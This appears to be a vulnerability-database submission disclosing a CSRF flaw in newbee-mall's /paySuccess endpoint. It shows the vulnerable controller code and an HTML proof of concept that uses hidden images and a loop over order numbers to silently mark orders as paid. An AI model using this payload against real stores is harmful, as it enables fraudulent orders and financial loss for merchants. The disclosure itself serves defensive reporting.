| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|
| Description | # CSRF Vulnerability in Payment Processing
## Summary
A **CSRF vulnerability** exists in the payment success confirmation endpoint `/paySuccess`. Attackers can mark orders as paid without actual payment, potentially leading to fraudulent order processing.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
public void addInterceptors(InterceptorRegistry registry) {
// ❌ Payment endpoints have no CSRF protection
// No interceptor configured for payment operations
}
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 147-156)
```java
@GetMapping("/paySuccess")
@ResponseBody
public Result paySuccess(@RequestParam("orderNo") String orderNo, @RequestParam("payType") int payType) {
// ❌ CRITICAL: GET method for payment confirmation!
// ❌ No CSRF token validation
// ❌ No actual payment gateway verification
// ⚠️ Trusts client-side payment confirmation
String payResult = newBeeMallOrderService.paySuccess(orderNo, payType);
if (ServiceResultEnum.SUCCESS.getResult().equals(payResult)) {
return ResultGenerator.genSuccessResult();
} else {
return ResultGenerator.genFailResult(payResult);
}
}
```
**Critical Security Flaws**:
1. ❌ Uses GET method for payment confirmation
2. ❌ No CSRF token validation
3. ❌ No server-side payment gateway verification
4. ⚠️ Can be triggered via simple link click
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
<title>Payment Processing</title>
</head>
<body>
<h2>???? Processing your payment...</h2>
<p>Please do not close this window.</p>
<!-- Invisible image triggers payment confirmation -->
<img src="http://localhost:28089/paySuccess?orderNo=202602051645001&payType=1"
style="display:none;"
onload="document.getElementById('msg').innerHTML='✅ Payment successful!'">
<div id="msg"></div>
<!-- Batch payment confirmation for multiple orders -->
<script>
var orders = [
'202602051645001',
'202602051645002',
'202602051645003'
];
orders.forEach(function(orderNo) {
var img = new Image();
img.src = 'http://localhost:28089/paySuccess?orderNo=' + orderNo + '&payType=1';
});
</script>
</body>
</html>
```
## Impact
**Fraudulent payment confirmation without actual payment** - Attackers can mark orders as paid without completing payment, leading to unauthorized product delivery and financial loss for the business.
---
**CVSS Score**: 8.6 (High)
|
|---|
| Source | ⚠️ https://github.com/newbee-ltd/newbee-mall/issues/113 |
|---|
| User | flashzyc (UID 92850) |
|---|
| Submission | 02/05/2026 11:58 (4 months ago) |
|---|
| Moderation | 02/18/2026 07:56 (13 days later) |
|---|
| Status | Duplicate |
|---|
| VulDB entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints cross-site request forgery] |
|---|
| Points | 0 |
|---|